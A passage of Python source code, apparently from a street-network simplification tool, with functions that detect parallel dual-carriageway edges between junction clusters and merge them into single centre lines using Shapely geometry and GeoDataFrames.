ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1\n ix_name = edges_gdf.columns.get_loc(\"name\")+1\n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n \n u, v = edges_gdf.loc[ix_line]['u'], edges_gdf.loc[ix_line]['v']\n line = edges_gdf.loc[ix_line].geometry\n name = edges_gdf.loc[ix_line]['name']\n line_coords = list(line.coords)\n \n if search_dir == 'v': \n coming_from = v\n other_node = u\n possible_matches = edges_gdf[(edges_gdf.u == v) | (edges_gdf.v == v)].copy()\n else: \n line_coords.reverse()\n coming_from = u\n other_node = v\n possible_matches = edges_gdf[(edges_gdf.u == u) | (edges_gdf.v == u)].copy()\n \n possible_matches.drop(ix_line, axis = 0, inplace = True)\n nodes_traversed = []\n lines_traversed = []\n clusters_traversed = []\n last_line = ix_line\n\n found = False\n distance_start = 0.0\n\n if specific_cluster:\n cluster_geometry = clusters_gdf.loc[desired_cluster].geometry\n distance_start = cluster_geometry.distance(nodes_gdf.loc[coming_from].geometry)\n \n while not found:\n if len(possible_matches) == 0: \n return(None, None, None, None, None, None)\n if specific_cluster:\n if cluster_geometry.distance(nodes_gdf.loc[coming_from].geometry) > distance_start:\n return(None, None, None, None, None, None)\n\n possible_matches.drop(last_line, axis = 0, errors = \"ignore\", inplace = True)\n if len(possible_matches) > 0:\n possible_matches['angle'] = 0.0\n for connector in possible_matches.itertuples():\n angle = angle_line_geometries(edges_gdf.loc[last_line].geometry, connector[ix_geo], deflection = True, degree = True)\n possible_matches.at[connector.Index, 'angle'] = angle\n \n possible_matches.sort_values(by = 'angle', ascending = True, inplace = True) \n \n if len(possible_matches) == 0: \n return(None, None, None, None, None, None) \n for connector in possible_matches.itertuples():\n if not is_continuation(last_line, connector.Index, edges_gdf):\n possible_matches.drop(connector.Index, axis = 0, inplace = True)\n continue\n \n else:\n uCP, vCP = connector[ix_u], connector[ix_v]\n \n if uCP == coming_from:\n cluster = nodes_gdf.loc[vCP].cluster\n coming_from = vCP\n distance_to = nodes_gdf.loc[vCP].geometry.distance(nodes_gdf.loc[other_node].geometry)\n distance_from = nodes_gdf.loc[uCP].geometry.distance(nodes_gdf.loc[other_node].geometry)\n if (vCP in nodes_traversed) | (distance_to < distance_from):\n possible_matches = possible_matches[0:0]\n break\n else: \n cluster = nodes_gdf.loc[uCP].cluster\n coming_from = uCP\n distance_to = nodes_gdf.loc[uCP].geometry.distance(nodes_gdf.loc[other_node].geometry)\n distance_from = nodes_gdf.loc[vCP].geometry.distance(nodes_gdf.loc[other_node].geometry)\n if (uCP in nodes_traversed) | (distance_to < distance_from):\n possible_matches = possible_matches[0:0]\n break\n \n if (cluster is None) | ((specific_cluster) & (cluster != desired_cluster)):\n lines_traversed.append(connector.Index)\n last_line = connector.Index\n\n if vCP == coming_from:\n possible_matches = edges_gdf[(edges_gdf.u == vCP) | (edges_gdf.v == vCP) ].copy()\n nodes_traversed.append(uCP) \n line_coords = line_coords + list(connector[ix_geo].coords)\n else:\n possible_matches = edges_gdf[(edges_gdf.u == uCP) | (edges_gdf.v == uCP)].copy()\n nodes_traversed.append(vCP)\n tmp = list(connector[ix_geo].coords)\n tmp.reverse()\n line_coords = line_coords + tmp\n if (specific_cluster) & (cluster is not None): \n clusters_traversed.append(cluster)\n break\n \n elif (cluster is not None) | ((specific_cluster) & (cluster == desired_cluster)):\n found = True\n lines_traversed.append(connector.Index)\n \n if vCP == coming_from:\n nodes_traversed.append(uCP)\n last_node = vCP\n line_coords = line_coords + list(connector[ix_geo].coords)\n else: \n nodes_traversed.append(vCP)\n last_node = uCP\n tmp = list(connector[ix_geo].coords)\n tmp.reverse()\n line_coords = line_coords + tmp\n break \n merged_line = LineString([coor for coor in line_coords]) \n if ((len(clusters_traversed) == 0) & (specific_cluster)):\n for n in nodes_traversed:\n if nodes_gdf.loc[n].cluster is not None:\n clusters_traversed.append(nodes_gdf.loc[n].cluster)\n \n return(cluster, merged_line, lines_traversed, nodes_traversed, last_node, clusters_traversed)\n \ndef center_line_cluster(line_geometries, nodes_gdf, clusters_gdf, cluster_from, cluster_to, one_cluster = False): #ok\n \n line_geometry_A = line_geometries[0]\n line_geometry_B = line_geometries[1]\n if line_geometry_A.centroid.distance(line_geometry_B.centroid)> 100: \n return None\n if one_cluster: \n coord_from = (nodes_gdf.loc[cluster_from]['x'], nodes_gdf.loc[cluster_from]['y'])\n else: coord_from = (clusters_gdf.loc[cluster_from]['x'], clusters_gdf.loc[cluster_from]['y'])\n \n coord_to = (clusters_gdf.loc[cluster_to]['x'], clusters_gdf.loc[cluster_to]['y'])\n line_coordsA = list(line_geometry_A.coords)\n line_coordsB = list(line_geometry_B.coords)\n \n # no need to reverse lines, as they should arrive already in the same order \n # different number of vertexes, connect the line\n while len(line_coordsA) > len(line_coordsB):\n index = int(len(line_coordsA)/2)\n del line_coordsA[index]\n while len(line_coordsB) > len(line_coordsA):\n index = int(len(line_coordsB)/2)\n del line_coordsB[index] \n \n new_line = line_coordsA\n for n, i in enumerate(line_coordsA):\n link = LineString([coor for coor in [line_coordsA[n], line_coordsB[n]]])\n np = link.centroid.coords[0] \n new_line[n] = np\n \n new_line[0] = coord_from\n new_line[-1] = coord_to\n center_line = LineString([coor for coor in new_line]) \n \n return center_line\n\ndef split_line_at_interpolation(point, line_geometry): #ok\n \n line_coords = list(line_geometry.coords)\n starting_point = Point(line_coords[0])\n np = nearest_points(point, line_geometry)[1]\n distance_start = line_geometry.project(np)\n \n new_line_A = []\n new_line_B = []\n\n if len(line_coords) == 2:\n new_line_A = [line_coords[0], np.coords[0]]\n new_line_B = [np.coords[0], line_coords[-1]]\n line_geometry_A = LineString([coor for coor in new_line_A])\n line_geometry_B = LineString([coor for coor in new_line_B])\n\n else:\n new_line_A.append(line_coords[0])\n new_line_B.append(np.coords[0])\n\n for n, i in enumerate(line_coords):\n if (n == 0) | (n == len(line_coords)-1): \n continue\n if line_geometry.project(Point(i)) < distance_start: \n new_line_A.append(i)\n else: new_line_B.append(i)\n\n new_line_A.append(np.coords[0])\n new_line_B.append(line_coords[-1])\n line_geometry_A = LineString([coor for coor in new_line_A])\n line_geometry_B = LineString([coor for coor in new_line_B])\n \n return((line_geometry_A, line_geometry_B), np)\n \ndef interpolate_on_centre_line(ix_line, center_line, nodes_gdf, edges_gdf, first_node, last_node, nodes_traversed, \n clusters_gdf = None, clusters_traversed = []):\n \n line_geometry = center_line \n new_index = ix_line \n distances = {}\n \n if len(clusters_traversed)> 0:\n nodes_traversed = nodes_traversed + clusters_traversed\n for node in nodes_traversed:\n if node in clusters_traversed: \n node_geometry = clusters_gdf.loc[node]['geometry']\n else: node_geometry = nodes_gdf.loc[node]['geometry']\n np = nearest_points(node_geometry, center_line)[1]\n distance = center_line.project(np)\n distances[node] = distance \n\n distances_sorted = sorted(distances.items(), key=lambda kv: kv[1]) \n \n for counter, node in enumerate(distances_sorted):\n \n node = distances_sorted[counter][0]\n if node in clusters_traversed: \n point = clusters_gdf.loc[node].geometry\n else: point = nodes_gdf.loc[node].geometry\n result, np = split_line_at_interpolation(point, line_geometry)\n \n if node in clusters_traversed:\n clusters_gdf.at[node, 'x'] = np.coords[0][0]\n clusters_gdf.at[node, 'y'] = np.coords[0][1]\n clusters_gdf.at[node, 'geometry'] = np\n if counter == 0: \n edges_gdf.at[new_index, 'u'] = first_node\n continue\n \n nodes_gdf.at[node, 'x'] = np.coords[0][0]\n nodes_gdf.at[node, 'y'] = np.coords[0][1]\n nodes_gdf.at[node, 'geometry'] = np \n \n #first part of the segment, adjusting node coordinates \n tmp = edges_gdf[(edges_gdf.u == node) | (edges_gdf.v == node)].copy()\n tmp.drop(ix_line, axis = 0, inplace = True, errors = 'ignore')\n \n # for ix, row in tmp.iterrows():\n # tmp_line_coords = list(row['geometry'].coords)\n # if row['u'] == node: tmp_line_coords.insert(1,nodes_gdf.loc[node]['geometry'].coords[0]) \n # if row['v'] == node: tmp_line_coords.insert(-1,nodes_gdf.loc[node]['geometry'].coords[0]) \n # edges_gdf.at[ix, 'geometry'] = LineString([coor for coor in tmp_line_coords])\n \n if counter == 0: \n edges_gdf.at[new_index, 'u'] = first_node\n edges_gdf.at[new_index, 'geometry'] = result[0]\n edges_gdf.at[new_index, 'v'] = node\n edges_gdf.at[new_index, 'new_geo'] = True\n \n # second part of the segment\n new_index = max(edges_gdf.index)+1\n \n edges_gdf.loc[new_index] = edges_gdf.loc[ix_line]\n edges_gdf.at[new_index, 'geometry'] = result[1]\n edges_gdf.at[new_index, 'u'] = node\n edges_gdf.at[new_index, 'v'] = last_node\n edges_gdf.at[new_index, 'edgeID'] = new_index\n edges_gdf.at[new_index, 'new_geo'] = True\n line_geometry = result[1] \n \ndef dissolve_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, first_node, last_node, \n nodes_traversed, direction, one_cluster = False, clusters_traversed = []):\n \n ix_lineA = ix_lines[0]\n ix_lineB = ix_lines[1]\n line_geometry_A = line_geometries[0]\n line_geometry_B = line_geometries[1]\n\n interpolation = len(nodes_traversed) > 0\n\n if not one_cluster:\n if ((edges_gdf.loc[ix_lineA]['name'] is not None) & (edges_gdf.loc[ix_lineB]['name'] is not None) & \n (edges_gdf.loc[ix_lineA]['name'] != edges_gdf.loc[ix_lineB]['name'])): \n return None\n if ((line_geometry_A.length > line_geometry_B.length*1.50) | (line_geometry_B.length > line_geometry_A.length*1.50)): \n return None\n \n if not one_cluster: \n if (Point(line_geometry_A.coords[0]).distance(Point(line_geometry_A.coords[0])) >\n Point(line_geometry_A.coords[0]).distance(Point(line_geometry_B.coords[-1]))):\n dist_SS = Point(line_geometry_A.coords[0]).distance(Point(line_geometry_B.coords[-1]))\n dist_EE = Point(line_geometry_A.coords[-1]).distance(Point(line_geometry_B.coords[0]))\n else:\n dist_SS = Point(line_geometry_A.coords[0]).distance(Point(line_geometry_B.coords[0]))\n dist_EE = Point(line_geometry_A.coords[-1]).distance(Point(line_geometry_B.coords[-1]))\n \n if (dist_SS > dist_EE*1.50) | (dist_EE > dist_SS*1.50): \n return None\n \n if one_cluster: \n cl = center_line_cluster(line_geometries, nodes_gdf, clusters_gdf, first_node, goal, one_cluster)\n else: cl = center_line_cluster(line_geometries, nodes_gdf, clusters_gdf, cluster, goal)\n if cl is None: \n return None\n \n if (direction == 'u') & (not interpolation):\n line_coords = list(cl.coords)\n line_coords.reverse() \n cl = LineString([coor for coor in line_coords])\n \n if interpolation:\n interpolate_on_centre_line(ix_lineA, cl, nodes_gdf, edges_gdf, first_node, last_node, nodes_traversed, clusters_gdf, clusters_traversed)\n return 'processed'\n \n edges_gdf.at[ix_lineA, 'new_geo'] = True\n edges_gdf.at[ix_lineA, 'geometry'] = cl\n return 'processed'\n\n\ndef dissolve_multiple_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, first_node, last_node, \n nodes_traversed, direction, one_cluster = False, clusters_traversed = []):\n \n dict_lines = dict(zip(ix_lines, line_geometries))\n secondary_lines = []\n max_dist = 0\n \n interpolation = len(nodes_traversed) > 0\n \n for line in dict_lines.values():\n for other_line in dict_lines.values():\n if line == other_line: \n continue\n if line.length > other_line.length * 1.50: \n return None \n \n if (len(dict_lines)%2 == 0):\n while len(dict_lines) > 2:\n distances = {}\n for key, line in dict_lines.items():\n cumulative_distance = 0.0\n for other_key, other_line in dict_lines.items():\n if key == other_key: \n continue\n mid_point = line.interpolate(0.5, normalized = True)\n other_mid_point = other_line.interpolate(0.5, normalized = True)\n distance = mid_point.distance(other_mid_point)\n cumulative_distance += distance\n \n mean_distance = cumulative_distance/len(dict_lines)\n distances[key] = mean_distance\n distances = {k: v for k, v in sorted(distances.items(), key=lambda item: item[1])}\n to_remove = list(distances.keys())[-2:]\n for key in to_remove: \n del dict_lines[key]\n \n line_geometries = list(dict_lines.values())\n \n if one_cluster: \n cl = center_line_cluster(line_geometries, nodes_gdf, clusters_gdf, first_node, goal, one_cluster = True)\n else: cl = center_line_cluster(line_geometries, nodes_gdf, clusters_gdf, cluster, goal)\n \n elif len(dict_lines)%2 != 0: \n \n while len(dict_lines) > 3:\n distances = {}\n for key, line in dict_lines.items():\n cumulative_distance = 0.0\n for other_key, other_line in dict_lines.items():\n if key == other_key: \n continue\n mid_point = line.interpolate(0.5, normalized = True)\n other_mid_point = other_line.interpolate(0.5, normalized = True)\n distance = mid_point.distance(other_mid_point)\n cumulative_distance += distance\n \n mean_distance = cumulative_distance/len(dict_lines)\n distances[key] = mean_distance\n distances = {k: v for k, v in sorted(distances.items(), key=lambda item: item[1])}\n to_remove = list(distances.keys())[-2:]\n for key in to_remove: \n del dict_lines[key]\n\n for key, line in dict_lines.items():\n for other_key, other_line in dict_lines.items():\n if key == other_key: \n continue\n mid_point = line.interpolate(0.5, normalized = True)\n other_mid_point = other_line.interpolate(0.5, normalized = True)\n distance = mid_point.distance(other_mid_point)\n if distance > max_dist: \n max_dist = distance\n secondary_lines = [key, other_key]\n\n ix_central = [x for x in list(dict_lines.keys()) if x not in secondary_lines][0]\n cl = dict_lines[ix_central]\n \n if (direction == 'u') & (not interpolation):\n line_coords = list(cl.coords)\n line_coords.reverse() \n cl = LineString([coor for coor in line_coords])\n\n if interpolation:\n interpolate_on_centre_line(ix_lines[0], cl, nodes_gdf, edges_gdf, first_node, last_node, nodes_traversed, clusters_gdf, clusters_traversed) \n else: \n edges_gdf.at[ix_lines[0], 'geometry'] = cl\n edges_gdf.at[ix_lines[0], 'new_geo'] = True\n \n return 'processed' \n \ndef is_possible_dual(ix_lineA, ix_lineB, edges_gdf, processed, one_cluster = False):\n \n line_geometry_A = edges_gdf.loc[ix_lineA].geometry\n line_geometry_B = edges_gdf.loc[ix_lineB].geometry\n \n if ix_lineB in processed: \n return False\n if not one_cluster:\n if ((edges_gdf.loc[ix_lineA].u == edges_gdf.loc[ix_lineB].u) | (edges_gdf.loc[ix_lineA].u == edges_gdf.loc[ix_lineB].v)\n | (edges_gdf.loc[ix_lineA].v == edges_gdf.loc[ix_lineB].u) | (edges_gdf.loc[ix_lineA].v == edges_gdf.loc[ix_lineB].v)): \n return False\n if not is_parallel(line_geometry_A, line_geometry_B, hard = True): \n return False\n else: \n if is_continuation(ix_lineA, ix_lineB, edges_gdf): \n return False\n\n return True\n \n\ndef simplify_dual_lines(nodes_gdf, edges_gdf, clusters_gdf):\n \n nodes_gdf.index, edges_gdf.index, clusters_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID, clusters_gdf.clusterID\n nodes_gdf.index.name, edges_gdf.index.name, clusters_gdf.index.name = None, None, None\n nodes_gdf, edges_gdf, clusters_gdf = nodes_gdf.copy(), edges_gdf.copy(), clusters_gdf.copy()\n \n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1\n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n ix_name = edges_gdf.columns.get_loc(\"name\")+1\n ix_cluster = nodes_gdf.columns.get_loc(\"cluster\")+1\n ix_clus_u, ix_clus_v = edges_gdf.columns.get_loc(\"clus_u\")+1, edges_gdf.columns.get_loc(\"clus_v\")+1\n ix_clus_uR, ix_clus_vR = edges_gdf.columns.get_loc(\"clus_uR\")+1, edges_gdf.columns.get_loc(\"clus_vR\")+1\n \n ################################ FROM NODES TO CLUSTERED JUNCTIONS\n \n clusters_gdf['keep'] = False\n edges_gdf['new_geo'] = False\n edges_gdf['forced_cluster'] = False\n original_nodes_gdf, original_edges_gdf, original_clusters_gdf = nodes_gdf.copy(), edges_gdf.copy(), clusters_gdf.copy()\n processed = []\n to_drop = []\n \n \n print('Simplifying dual lines: First part - clusters')\n clusters_gdf.sort_values(by = 'degree', ascending = False, inplace = True)\n list_cluster = clusters_gdf.index.values.tolist() \n \n for cluster in list_cluster:\n edges_tmp = original_edges_gdf[((original_edges_gdf.clus_u == cluster) | (original_edges_gdf.clus_v == cluster))].copy()\n edges_tmp = edges_tmp[edges_tmp.clus_u != edges_tmp.clus_v].copy()\n edges_tmp.sort_values(by = 'length', ascending = False, inplace = True)\n if len(edges_tmp) == 1: \n continue\n\n for road in edges_tmp.itertuples(): \n if road.Index in processed: \n continue\n possible_dual_lines = edges_tmp.copy() \n edges_gdf['forced_cluster'] = False\n \n # disregard unparallel lines \n possible_dual_lines['candidate'] = True\n possible_dual_lines['candidate'] = possible_dual_lines.apply(lambda r: is_possible_dual(road.Index, r['edgeID'], original_edges_gdf, \n processed), axis = 1)\n possible_dual_lines.at[road.Index, 'candidate' ] = True\n possible_dual_lines = possible_dual_lines[possible_dual_lines.candidate]\n if len(possible_dual_lines) < 2: \n continue\n possible_dual_lines['dir'] = 'v'\n\n # orientate everything from \"u\" to \"v\" in relation to the cluster\n for candidate in possible_dual_lines.itertuples():\n if candidate[ix_clus_v] == cluster:\n line_coords = list(candidate[ix_geo].coords)\n line_coords.reverse() \n new_line_geometry = LineString([coor for coor in line_coords])\n old_u = candidate[ix_u]\n old_clus_u, old_clus_uR = candidate[ix_clus_u], candidate[ix_clus_uR]\n \n possible_dual_lines.at[candidate.Index,'geometry'] = new_line_geometry\n possible_dual_lines.at[candidate.Index,'u'] = candidate[ix_v]\n possible_dual_lines.at[candidate.Index,'v'] = old_u\n possible_dual_lines.at[candidate.Index,'clus_u'] = candidate[ix_clus_v]\n possible_dual_lines.at[candidate.Index,'clus_v'] = old_clus_u\n possible_dual_lines.at[candidate.Index,'clus_uR'] = candidate[ix_clus_vR]\n possible_dual_lines.at[candidate.Index,'clus_vR'] = old_clus_uR\n possible_dual_lines.at[candidate.Index, 'dir'] = 'u' # indicates original dir\n \n # does the line considered in the loop reach a cluster? if not straight away, at some point? \n if possible_dual_lines.loc[road.Index]['clus_v'] is not None: \n goal = possible_dual_lines.loc[road.Index]['clus_v']\n else: goal = possible_dual_lines.loc[road.Index]['clus_vR']\n if (goal is None) | (goal == cluster): \n continue\n \n for candidate in possible_dual_lines.itertuples():\n \n if candidate[ix_clus_v] is not None: \n secondary_goal = candidate[ix_clus_v]\n else: secondary_goal = candidate[ix_clus_vR]\n if secondary_goal != goal: \n direction = possible_dual_lines.at[candidate.Index, 'dir']\n forced_cluster = indirect_cluster(original_nodes_gdf, original_edges_gdf, original_clusters_gdf, candidate.Index, direction, \n specific_cluster = True, desired_cluster = goal)[0] \n if forced_cluster == goal:\n possible_dual_lines.at[candidate.Index, 'forced_cluster'] = True\n possible_dual_lines.at[candidate.Index, 'clus_vR'] = forced_cluster\n possible_dual_lines.at[candidate.Index, 'clus_v'] = None\n else: possible_dual_lines.drop(candidate.Index, axis = 0, inplace = True)\n \n done = False\n lines_traversed = []\n if len(possible_dual_lines) == 1: \n continue # no parallel streets to row.Index \n \n\n line_geometries = [possible_dual_lines.iloc[i]['geometry'] for i in range(0, len(possible_dual_lines))] \n ix_lines = [possible_dual_lines.iloc[i].edgeID for i in range(0, len(possible_dual_lines))] \n c_u = [possible_dual_lines.iloc[i]['clus_u'] for i in range(0, len(possible_dual_lines))]\n c_v = [possible_dual_lines.iloc[i]['clus_v'] for i in range(0, len(possible_dual_lines))]\n u = [possible_dual_lines.iloc[i]['u'] for i in range(0, len(possible_dual_lines))] \n v = [possible_dual_lines.iloc[i]['v'] for i in range(0, len(possible_dual_lines))]\n forced_cluster = [possible_dual_lines.iloc[i]['forced_cluster'] for i in range(0, len(possible_dual_lines))]\n drs = [possible_dual_lines.iloc[i]['dir'] for i in range(0, len(possible_dual_lines))] \n list_nodes_traversed = [[] for i in range(0, len(possible_dual_lines))]\n list_lines_traversed = [[] for i in range(0, len(possible_dual_lines))]\n list_clusters_traversed = [[] for i in range(0, len(possible_dual_lines))] \n last_node, nodes_traversed, lines_traversed, clusters_traversed = None, [], [], []\n \n ######################################################## \n ## OPTION 1: they all reach another cluster:\n\n if all(x == c_v[0] for x in c_v) & (not None in c_v):\n if len(possible_dual_lines) == 2:\n merged = dissolve_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, u[0], last_node,\n nodes_traversed, drs[0])\n else:\n merged = dissolve_multiple_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, u[0], \n last_node, nodes_traversed, drs[0])\n if merged is None: \n continue \n done = True\n \n ######################################################## \n ## OPTION 2: at least one does not reach the cluster: \n \n elif None in c_v:\n # pre-check \n if len(possible_dual_lines) > 2:\n all_checked = False\n \n while not all_checked:\n all_checked = True\n for n, line in enumerate(line_geometries):\n for nn, other_line in enumerate(line_geometries):\n if n >= nn : \n continue\n if ((line.coords[0] == other_line.coords[0]) | (line.coords[0] == other_line.coords[-1]) |\n (line.coords[-1] == other_line.coords[0]) | (line.coords[-1] == other_line.coords[-1])):\n if line.length > other_line.length: \n to_remove = n\n elif line.length < other_line.length: \n to_remove = nn\n else: continue\n for ll in [c_u, c_v, u, v, drs, line_geometries, ix_lines, list_nodes_traversed, list_lines_traversed, \n list_clusters_traversed, forced_cluster]: \n del ll[to_remove]\n all_checked = False\n break\n if not all_checked: \n break\n \n if len(ix_lines) < 2: \n continue\n \n for n, c in enumerate(c_v):\n specific_cluster, desired_cluster = False, None\n if c is None:\n if forced_cluster[n]:\n specific_cluster = True\n desired_cluster = goal\n \n _, line_geometries[n], list_lines_traversed[n], list_nodes_traversed[n], last_node, list_clusters_traversed[n] = indirect_cluster(\n original_nodes_gdf, original_edges_gdf, original_clusters_gdf, ix_lines[n], drs[n], specific_cluster = specific_cluster, \n desired_cluster = desired_cluster)\n \n if len(possible_dual_lines) > 2:\n all_checked = False\n \n while not all_checked:\n all_checked = True\n for n, i in enumerate(list_lines_traversed):\n for nn, ii in enumerate(list_lines_traversed):\n if n >= nn: \n continue \n if len(list(set(i).intersection(ii))) > 0: \n for ll in [c_u, c_v, u, v, drs, line_geometries, ix_lines, list_nodes_traversed, list_lines_traversed,\n list_clusters_traversed, forced_cluster]: \n del ll[nn]\n all_checked = False\n break\n if not all_checked: \n break\n\n if len(ix_lines) < 2: \n continue\n \n # last node does not matter, as it will be reassigned to the relative cluster\n nodes_traversed = [item for items in list_nodes_traversed for item in items if item is not None]\n lines_traversed = [item for items in list_lines_traversed for item in items if item is not None]\n clusters_traversed = [item for items in list_clusters_traversed for item in items if item is not None]\n \n if len(possible_dual_lines) == 2:\n common = list(set(list_lines_traversed[0]).intersection(list_lines_traversed[1]))\n if len(common) > 0:\n continue\n else: \n merged = dissolve_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, u[0], last_node, \n nodes_traversed, drs[0], clusters_traversed = clusters_traversed)\n else:\n merged = dissolve_multiple_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, cluster, goal, u[0], last_node,\n nodes_traversed, drs[0], clusters_traversed = clusters_traversed)\n if merged is None:\n continue\n \n done = True\n # print('OPTION 2 - COMPLETED')\n\n if not done: \n pass \n else: \n clusters = [cluster, goal]\n between = (\n list(original_edges_gdf.index[(original_edges_gdf.u.isin(nodes_traversed)) & (original_edges_gdf.v.isin(nodes_traversed))])+\n list(original_edges_gdf.index[(original_edges_gdf.clus_u.isin(clusters)) & (original_edges_gdf.v.isin(nodes_traversed))])+\n list(original_edges_gdf.index[(original_edges_gdf.clus_v.isin(clusters)) & (original_edges_gdf.u.isin(nodes_traversed))])+ \n list(original_edges_gdf.index[(original_edges_gdf.clus_uR.isin(clusters)) & (original_edges_gdf.v.isin(nodes_traversed))])+\n list(original_edges_gdf.index[(original_edges_gdf.clus_vR.isin(clusters)) & (original_edges_gdf.u.isin(nodes_traversed))]))\n \n\n between = list(set(between + lines_traversed + ix_lines)) \n to_drop = to_drop + between\n to_drop = list(filter(lambda a: a != ix_lines[0], to_drop)) \n processed = processed + [ix_lines[0]] + to_drop\n clusters_gdf.at[clusters, 'keep'] = True\n if len(original_edges_gdf.loc[processed][original_edges_gdf.pedestrian == 1]) > 0: \n edges_gdf.at[ix_lines[0], 'pedestrian'] = 1\n\n edges_gdf.drop(to_drop, axis = 0, inplace = True, errors = 'ignore')\n edges_gdf['edgeID'] = edges_gdf.index.values.astype(int)\n nodes_gdf['nodeID'] = nodes_gdf.index.values.astype(int)\n nodes_gdf, edges_gdf = reassign_edges(nodes_gdf, edges_gdf, clusters_gdf) \n return(nodes_gdf, edges_gdf, clusters_gdf) \n\n\ndef simplify_dual_lines_nodes_to_cluster(nodes_gdf, edges_gdf, clusters_gdf):\n \n nodes_gdf.index, edges_gdf.index, clusters_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID, clusters_gdf.clusterID\n nodes_gdf.index.name, edges_gdf.index.name, clusters_gdf.index.name = None, None, None\n nodes_gdf, edges_gdf, clusters_gdf = nodes_gdf.copy(), edges_gdf.copy(), clusters_gdf.copy()\n\n processed = []\n print('Simplifying dual lines: Second part - nodes')\n edges_gdf = _assign_cluster_edges(nodes_gdf, edges_gdf, clusters_gdf)\n\n original_edges_gdf = edges_gdf.copy()\n original_nodes_gdf = nodes_gdf.copy()\n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1\n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n ix_name = edges_gdf.columns.get_loc(\"name\")+1\n ix_cluster = nodes_gdf.columns.get_loc(\"cluster\")+1\n ix_clus_u, ix_clus_v = edges_gdf.columns.get_loc(\"clus_u\")+1, edges_gdf.columns.get_loc(\"clus_v\")+1\n ix_clus_uR, ix_clus_vR = edges_gdf.columns.get_loc(\"clus_uR\")+1, edges_gdf.columns.get_loc(\"clus_vR\")+1\n \n clusters_gdf['keep'] = False\n edges_gdf['new_geo'] = False\n to_drop = []\n \n for node in nodes_gdf.itertuples():\n tmp = original_edges_gdf[((original_edges_gdf.u == node[0]) | (original_edges_gdf.v == node[0]))].copy()\n \n for road in tmp.itertuples():\n if road.Index in processed: \n continue \n if road[ix_u] == node[0]:\n goal = road[ix_clus_v]\n if goal is None: \n goal = road[ix_clus_vR]\n elif road[ix_v] == node[0]:\n goal = road[ix_clus_u]\n if goal is None: \n goal = road[ix_clus_uR]\n if goal is None: \n continue\n \n possible_dual_lines = tmp[(tmp.clus_u == goal) | (tmp.clus_uR == goal) | (tmp.clus_v == goal) | (tmp.clus_vR == goal)].copy()\n possible_dual_lines['dir'] = 'v'\n for candidate in possible_dual_lines.itertuples():\n if candidate[ix_v] == node[0]:\n line_coords = list(candidate[ix_geo].coords)\n line_coords.reverse() \n new_line_geometry = LineString([coor for coor in line_coords])\n old_u, old_clus_u, old_clus_uR = candidate[ix_u], candidate[ix_clus_u], candidate[ix_clus_uR]\n possible_dual_lines.at[candidate[0],'geometry'] = new_line_geometry\n possible_dual_lines.at[candidate[0],'u'] = candidate[ix_v]\n possible_dual_lines.at[candidate[0],'v'] = old_u\n possible_dual_lines.at[candidate[0],'clus_u'] = candidate[ix_clus_v]\n possible_dual_lines.at[candidate[0],'clus_v'] = old_clus_u\n possible_dual_lines.at[candidate[0],'clus_uR'] = candidate[ix_clus_vR]\n possible_dual_lines.at[candidate[0],'clus_vR'] = old_clus_uR\n possible_dual_lines.at[candidate[0], 'dir'] = 'u' # indicates original dir\n \n possible_dual_lines = possible_dual_lines[(possible_dual_lines.clus_v == goal) | (possible_dual_lines.clus_vR == goal)].copy()\n\n done = False\n if len(possible_dual_lines) == 1: \n continue # no parallel streets to road.Index \n \n c_u = [possible_dual_lines.iloc[i]['clus_u'] for i in range(0, len(possible_dual_lines))]\n c_v = [possible_dual_lines.iloc[i]['clus_v'] for i in range(0, len(possible_dual_lines))]\n u = [possible_dual_lines.iloc[i]['u'] for i in range(0, len(possible_dual_lines))] \n v = [possible_dual_lines.iloc[i]['v'] for i in range(0, len(possible_dual_lines))] \n drs = [possible_dual_lines.iloc[i]['dir'] for i in range(0, len(possible_dual_lines))] \n line_geometries = [possible_dual_lines.iloc[i]['geometry'] for i in range(0, len(possible_dual_lines))] \n ix_lines = [possible_dual_lines.iloc[i].edgeID for i in range(0, len(possible_dual_lines))] \n list_nodes_traversed = [[] for i in range(0, len(possible_dual_lines))]\n list_lines_traversed = [[] for i in range(0, len(possible_dual_lines))] \n last_node, nodes_traversed, lines_traversed = None, [], [] \n \n ######################################################## OPTION 1\n if all(x == c_v[0] for x in c_v) & (not None in c_v):\n \n if len(possible_dual_lines) == 2:\n merged = dissolve_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, None, goal, u[0], last_node,\n nodes_traversed, drs[0], one_cluster = True)\n else:\n merged = dissolve_multiple_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, None, goal, u[0], \n last_node, nodes_traversed, drs[0], one_cluster = True)\n if merged is None: \n # print('OPTION 1 -- NOT COMPLETED after having attempted to dissolve')\n continue \n\n done = True\n between = (list(original_edges_gdf.index[(original_edges_gdf.u.isin(nodes_traversed)) & \n (original_edges_gdf.v.isin(nodes_traversed))])) \n \n ######################################################## OPTION 2\n elif None in c_v:\n\n for n, c in enumerate(c_v):\n if c is None:\n _, line_geometries[n], list_lines_traversed[n], list_nodes_traversed[n], last_node,_ = indirect_cluster(\n original_nodes_gdf, original_edges_gdf, clusters_gdf, ix_lines[n], drs[n])\n \n nodes_traversed = [item for items in list_nodes_traversed for item in items if item is not None]\n lines_traversed = [item for items in list_lines_traversed for item in items if item is not None]\n if len(possible_dual_lines) == 2:\n common = list(set(list_lines_traversed[0]).intersection(list_lines_traversed[1]))\n if len(common) > 0:\n continue\n else: \n merged = dissolve_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, None, goal, u[0], last_node, \n 